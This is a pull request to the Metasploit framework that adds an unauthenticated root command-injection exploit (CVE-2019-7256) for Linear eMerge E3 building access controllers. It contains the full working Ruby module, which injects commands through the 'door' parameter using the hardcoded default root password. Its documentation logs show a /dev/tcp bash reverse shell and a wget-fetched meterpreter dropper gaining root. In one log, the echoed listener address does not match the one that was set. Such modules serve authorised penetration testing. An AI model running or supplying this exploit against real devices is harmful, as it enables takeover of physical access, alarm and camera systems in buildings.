### PR TITLE
Pre-Authenticated Remote Code Execution in Nortek Linear eMerge Access Controller [CVE-2019-7256] 

### DIFF
--- a/documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
+++ b/documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
@@ -32,7 +32,9 @@ This module has been tested against a Linear eMerge access controller with the s
 1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
 
 ## Options
-No specific options.
+### ROOT_PASSWORD
+The password of the `root` user on the target device. Defaults to `davestyle`, which is
+the default root password for Linear eMerge E3-Series devices.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
+++ b/documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
@@ -4,23 +4,21 @@ Nortek Security & Control, LLC (NSC) is a leader in wireless security, home auto
 The eMerge E3-Series is part of Linear’s access control platform, that delivers entry-level access control to buildings.
 It is a web based application where the HTTP web interface is typically exposed to the public internet.
 
-The Linear eMerge E3 versions `1.00-06` and below are vulnerable to an unauthenticated command injection remote root exploit
-that leverages card_scan_decoder.php.
-This can be exploited to inject and execute arbitrary shell commands as the root user through the `No` and `door` HTTP GET parameter.
-A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.
+The Linear eMerge E3 versions `1.00-06` and below are vulnerable to unauthenticated command injection in card_scan_decoder.php
+via the  `No` and `door` HTTP GET parameter. Successful exploitation results in command execution as the root user.
 
-Building Automation and Access Control systems are at the heart of many critical infrastructures, and their security is vital.
+Building automation and access control systems are at the heart of many critical infrastructures, and their security is vital.
 Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems,
-cameras, boilers, lights, safety alarm systems in an entire building.
+cameras, boilers, lights, safety alarm systems within a building.
 
-This issue affects all Linear eMerge E3 versions up to and including `1.00-06`.
+This issue affects all Linear eMerge E3-Series with firmware versions up to and including `1.00-06`.
 
-Installing a vulnerable test bed requires a Linear eMerge E3 access controller with the vulnerable software loaded.
+Installing a vulnerable test bed requires a Linear eMerge E3-Series access controller with the vulnerable software loaded.
 
 This module has been tested against a Linear eMerge access controller with the specifications listed below:
 
-* Nortek Linear eMerge E3 access controller
-* Firmware < `v1.00-06`
+* Nortek Linear eMerge E3 Elite access controller
+* Firmware: `v1.00-03`
 
 ## Verification Steps
 
@@ -38,7 +36,7 @@ No specific options.
 
 ## Scenarios
 
-### Nortek Linear eMerge E3 access controller bash reverse shell
+### Nortek Linear eMerge E3 Elite access controller bash reverse shell
 
 ```
 msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
@@ -92,7 +90,7 @@ msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Checking if 192.168.100.180:80 can be exploited.
 [*] Performing command injection test issuing a sleep command of 2 seconds.
-[*] Elapsed time: 3.1638134399981936 seconds.
+[*] Elapsed time: 3.16 seconds.
 [+] The target is vulnerable. Successfully tested command injection.
 [*] Executing Unix Command with bash -c '0<&179-;exec 179<>/dev/tcp/192.168.100.7/4444;sh <&179 >&179 2>&179'
 [*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54274) at 2022-12-01 18:51:54 +0000
@@ -104,7 +102,7 @@ root
 exit
 ```
 
-### Nortek Linear eMerge E3 access controller meterpreter session
+### Nortek Linear eMerge E3 Elite access controller meterpreter session
 
 ```
 msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
@@ -158,7 +156,7 @@ msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Checking if 192.168.100.180:80 can be exploited.
 [*] Performing command injection test issuing a sleep command of 2 seconds.
-[*] Elapsed time: 3.177188547007972 seconds.
+[*] Elapsed time: 3.18 seconds.
 [+] The target is vulnerable. Successfully tested command injection.
 [*] Executing Linux Dropper
 [*] Using URL: http://192.168.100.7:8080/n6tUft9RrS

--- a/documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
+++ b/documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
@@ -179,10 +179,6 @@ Server username: root
 ```
 
 ## Limitations
-Staged payloads like `linux/armle/meterpreter/reverse_tcp` or `linux/armle/shell/reverse_tcp` do not work.
-Manually tested these payloads with `msfvenom`, but they produce segmentation faults when executed on the target.
-However stageless payloads such as `linux/armle/meterpreter_reverse_tcp` and `linux/armle/shell_reverse_tcp` are working.
-
 Due to the limitations of restricted `busybox` command implementation on the Linear eMerge E3 Access Controller, only a
 few unix command payloads will work such as `cmd/unix/reverse_bash` or `cmd/unix/reverse` (telnet).
 

--- a/documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
+++ b/documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
@@ -1,0 +1,188 @@
+## Vulnerable Application
+
+Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation and personal safety systems and devices.
+The eMerge E3-Series is part of Linear’s access control platform, that delivers entry-level access control to buildings.
+It is a web based application where the HTTP web interface is typically exposed to the public internet.
+
+The Linear eMerge E3 versions `1.00-06` and below are vulnerable to an unauthenticated command injection remote root exploit
+that leverages card_scan_decoder.php.
+This can be exploited to inject and execute arbitrary shell commands as the root user through the `No` and `door` HTTP GET parameter.
+A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.
+
+Building Automation and Access Control systems are at the heart of many critical infrastructures, and their security is vital.
+Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems,
+cameras, boilers, lights, safety alarm systems in an entire building.
+
+This issue affects all Linear eMerge E3 versions up to and including `1.00-06`.
+
+Installing a vulnerable test bed requires a Linear eMerge E3 access controller with the vulnerable software loaded.
+
+This module has been tested against a Linear eMerge access controller with the specifications listed below:
+
+* Nortek Linear eMerge E3 access controller
+* Firmware < `v1.00-06`
+
+## Verification Steps
+
+1. `use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command or 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+No specific options.
+
+## Scenarios
+
+### Nortek Linear eMerge E3 access controller bash reverse shell
+
+```
+msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options
+
+Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
+                                       or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 0
+target => 0
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited.
+[*] Performing command injection test issuing a sleep command of 2 seconds.
+[*] Elapsed time: 3.1638134399981936 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Unix Command with bash -c '0<&179-;exec 179<>/dev/tcp/192.168.100.7/4444;sh <&179 >&179 2>&179'
+[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54274) at 2022-12-01 18:51:54 +0000
+
+uname -a
+Linux cuckoo 3.14.54 #1 SMP PREEMPT Thu Dec 6 19:08:58 PST 2018 armv7l GNU/Linux
+whoami
+root
+exit
+```
+
+### Nortek Linear eMerge E3 access controller meterpreter session
+
+```
+msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
+[*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options
+
+Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
+                                       or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/armle/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 1
+target => 1
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited.
+[*] Performing command injection test issuing a sleep command of 2 seconds.
+[*] Elapsed time: 3.177188547007972 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Linux Dropper
+[*] Using URL: http://192.168.100.7:8080/n6tUft9RrS
+[*] Client 127.0.0.1 (Wget) requested /n6tUft9RrS
+[*] Sending payload to 127.0.0.1 (Wget)
+[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:49448) at 2022-12-01 18:50:26 +0000
+[*] Command Stager progress - 100.00% done (125/125 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.100.180
+OS           :  (Linux 3.14.54)
+Architecture : armv7l
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+meterpreter > getuid
+Server username: root
+```
+
+## Limitations
+Staged payloads like `linux/armle/meterpreter/reverse_tcp` or `linux/armle/shell/reverse_tcp` do not work.
+Manually tested these payloads with `msfvenom`, but they produce segmentation faults when executed on the target.
+However stageless payloads such as `linux/armle/meterpreter_reverse_tcp` and `linux/armle/shell_reverse_tcp` are working.
+
+Due to the limitations of restricted `busybox` command implementation on the Linear eMerge E3 Access Controller, only a
+few unix command payloads will work such as `cmd/unix/reverse_bash` or `cmd/unix/reverse` (telnet).
+

--- a/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
+++ b/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
@@ -1,0 +1,125 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  # Default root password on a Linear eMerge E3 access controller
+  ROOT_PWD = 'davestyle'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Linear eMerge E3 Access Controller Command Injection',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in the Linear eMerge
+          E3 Access Controller. The issue is triggered by an unsanitized exec() PHP
+          function allowing arbitrary command execution with root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor
+        ],
+        'References' => [
+          [ 'CVE', '2019-7256'],
+          [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],
+          [ 'URL', 'https://www.nortekcontrol.com' ],
+          [ 'PACKETSTORM', '155256']
+        ],
+        'DisclosureDate' => '2019-10-29',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_ARMLE],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    random_no = rand(30..100)
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'card_scan_decoder.php'),
+      'vars_get' =>
+        {
+          'No' => random_no,
+          'door' => "`echo #{ROOT_PWD}|su -c \"#{cmd}\"`"
+        }
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
+  end
+
+  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    sleep_time = rand(2..6)
+    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
+    res, elapsed_time = Rex::Stopwatch.elapsed_time do
+      execute_command("sleep #{sleep_time}")
+    end
+
+    return CheckCode::Unknown('No response received from the target!') unless res
+
+    print_status("Elapsed time: #{elapsed_time} seconds.")
+    return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time
+
+    CheckCode::Vulnerable('Successfully tested command injection.')
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_cmd
+      print_status("Executing #{target.name} with #{payload.encoded}")
+      execute_command(payload.encoded)
+    when :linux_dropper
+      print_status("Executing #{target.name}")
+      execute_cmdstager(linemax: 262144)
+    end
+  end
+end

--- a/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
+++ b/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
@@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     return CheckCode::Unknown('No response received from the target!') unless res
-    return CheckCode::Safe('Target is not affected by this vulnerability.') unless res.code == 200
+    return CheckCode::Safe('Target is not affected by this vulnerability.') unless res.code == 200 && !res.body.blank? && res.body =~ /"card_format_default":"/
 
     print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")
     return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time
@@ -122,6 +122,8 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Type']
     when :unix_cmd
       print_status("Executing #{target.name} with #{payload.encoded}")
+      # Don't check the response here since the server won't respond
+      # if the payload is successfully executed.
       execute_command(payload.encoded)
     when :linux_dropper
       print_status("Executing #{target.name}")

--- a/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
+++ b/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
@@ -110,9 +110,10 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     return CheckCode::Unknown('No response received from the target!') unless res
+    return CheckCode::Safe('Target is not affected by this vulnerability.') unless res.code == 200
 
     print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")
-    return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time
+    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time
 
     CheckCode::Vulnerable('Successfully tested command injection.')
   end

--- a/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
+++ b/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
@@ -12,18 +12,16 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::CmdStager
   prepend Msf::Exploit::Remote::AutoCheck
 
-  # Default root password on a Linear eMerge E3 access controller
-  ROOT_PWD = 'davestyle'.freeze
-
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Linear eMerge E3 Access Controller Command Injection',
+        'Name' => 'Linear eMerge E3-Series Access Controller Command Injection',
         'Description' => %q{
           This module exploits a command injection vulnerability in the Linear eMerge
-          E3 Access Controller. The issue is triggered by an unsanitized exec() PHP
-          function allowing arbitrary command execution with root privileges.
+          E3-Series Access Controller. The Linear eMerge E3 versions `1.00-06` and below are vulnerable
+          to unauthenticated command injection in card_scan_decoder.php via the  `No` and `door` HTTP GET parameter.
+          Successful exploitation results in command execution as the `root` user.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -33,14 +31,15 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           [ 'CVE', '2019-7256'],
           [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],
-          [ 'URL', 'https://www.nortekcontrol.com' ],
+          [ 'URL', 'https://na.niceforyou.com/' ],
           [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],
+          [ 'EDB', '47649'],
           [ 'PACKETSTORM', '155256']
         ],
         'DisclosureDate' => '2019-10-29',
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_ARMLE],
-        'Privileged' => false,
+        'Privileged' => true,
         'Targets' => [
           [
             'Unix Command',
@@ -78,6 +77,11 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     )
+    register_options(
+      [
+        OptString.new('ROOT_PASSWORD', [ true, 'default root password on a vulnerable Linear eMerge E3-Series access controller', 'davestyle']),
+      ]
+    )
   end
 
   def execute_command(cmd, _opts = {})
@@ -88,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' =>
         {
           'No' => random_no,
-          'door' => "`echo #{ROOT_PWD}|su -c \"#{cmd}\"`"
+          'door' => "`echo #{datastore['ROOT_PASSWORD']}|su -c \"#{cmd}\"`"
         }
     })
   rescue StandardError => e
@@ -99,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution
   def check
     print_status("Checking if #{peer} can be exploited.")
-    sleep_time = rand(2..6)
+    sleep_time = rand(2..10)
     print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
     res, elapsed_time = Rex::Stopwatch.elapsed_time do
       execute_command("sleep #{sleep_time}")
@@ -107,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Unknown('No response received from the target!') unless res
 
-    print_status("Elapsed time: #{elapsed_time} seconds.")
+    print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")
     return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time
 
     CheckCode::Vulnerable('Successfully tested command injection.')

--- a/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
+++ b/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
@@ -34,6 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2019-7256'],
           [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],
           [ 'URL', 'https://www.nortekcontrol.com' ],
+          [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],
           [ 'PACKETSTORM', '155256']
         ],
         'DisclosureDate' => '2019-10-29',


### PR DESCRIPTION
Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation and personal safety systems and devices. The eMerge E3-Series is part of Linear’s access control platform, that delivers entry-level access control to buildings.
It is a web based application where the HTTP web interface is typically exposed to the public internet.

The Linear eMerge E3-Series with firmware versions `1.00-06` and below are vulnerable to an unauthenticated command injection remote root exploit that leverages card_scan_decoder.php.
This can be exploited to inject and execute arbitrary shell commands as the root user through the `No` and `door` HTTP GET parameter.
A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.

Building automation and access control systems are at the heart of many critical infrastructures, and their security is vital.
Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems, cameras, boilers, lights, safety alarm systems within a building.

This issue affects all Linear eMerge E3 versions up to and including `1.00-06`.

Installing a vulnerable test bed requires a Linear eMerge E3-Series access controller with the vulnerable software loaded.

This module has been tested against a Linear eMerge access controller with the specifications listed below:

* Nortek Linear eMerge E3 Elite access controller
* Firmware: `v1.00-03`

## Verification

- [ ] `use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256`
- [ ] `set RHOSTS <TARGET HOSTS>`
- [ ] `set RPORT <port>`
- [ ] `set LHOST <attacker host ip>`
- [ ] `set LPORT <attacker host port>`
- [ ] `set TARGET <0-Unix command or 1-Linux Dropper>`
- [ ] `exploit`

You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.

## Options
No specific options.

## Scenarios

### Nortek Linear eMerge E3 Elite access controller bash reverse shell

```
msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options

Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
                                       or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


View the full module info with the info, or info -d command.

msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.254
lhost => 192.168.100.7
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
lport => 4444
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 0
target => 0
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit

[*] Started reverse TCP handler on 192.168.100.254:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.180:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 2 seconds.
[*] Elapsed time: 3.16 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command with bash -c '0<&179-;exec 179<>/dev/tcp/192.168.100.254/4444;sh <&179 >&179 2>&179'
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54274) at 2022-12-01 18:51:54 +0000

uname -a
Linux cuckoo 3.14.54 #1 SMP PREEMPT Thu Dec 6 19:08:58 PST 2018 armv7l GNU/Linux
whoami
root
exit
```

### Nortek Linear eMerge E3 Elite access controller meterpreter session

```
msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
[*] Using configured payload linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options

Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
                                       or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (linux/armle/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


View the full module info with the info, or info -d command.

msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.254
lhost => 192.168.100.7
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
lport => 4444
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 1
target => 1
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit

[*] Started reverse TCP handler on 192.168.100.254:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.180:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 2 seconds.
[*] Elapsed time: 3.18 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper
[*] Using URL: http://192.168.100.254:8080/n6tUft9RrS
[*] Client 127.0.0.1 (Wget) requested /n6tUft9RrS
[*] Sending payload to 127.0.0.1 (Wget)
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:49448) at 2022-12-01 18:50:26 +0000
[*] Command Stager progress - 100.00% done (125/125 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.100.180
OS           :  (Linux 3.14.54)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > getuid
Server username: root
```

## Limitations
Due to the limitations of restricted `busybox` command implementation on the Linear eMerge E3 Access Controller, only a
few unix command payloads will work such as `cmd/unix/reverse_bash` or `cmd/unix/reverse` (telnet).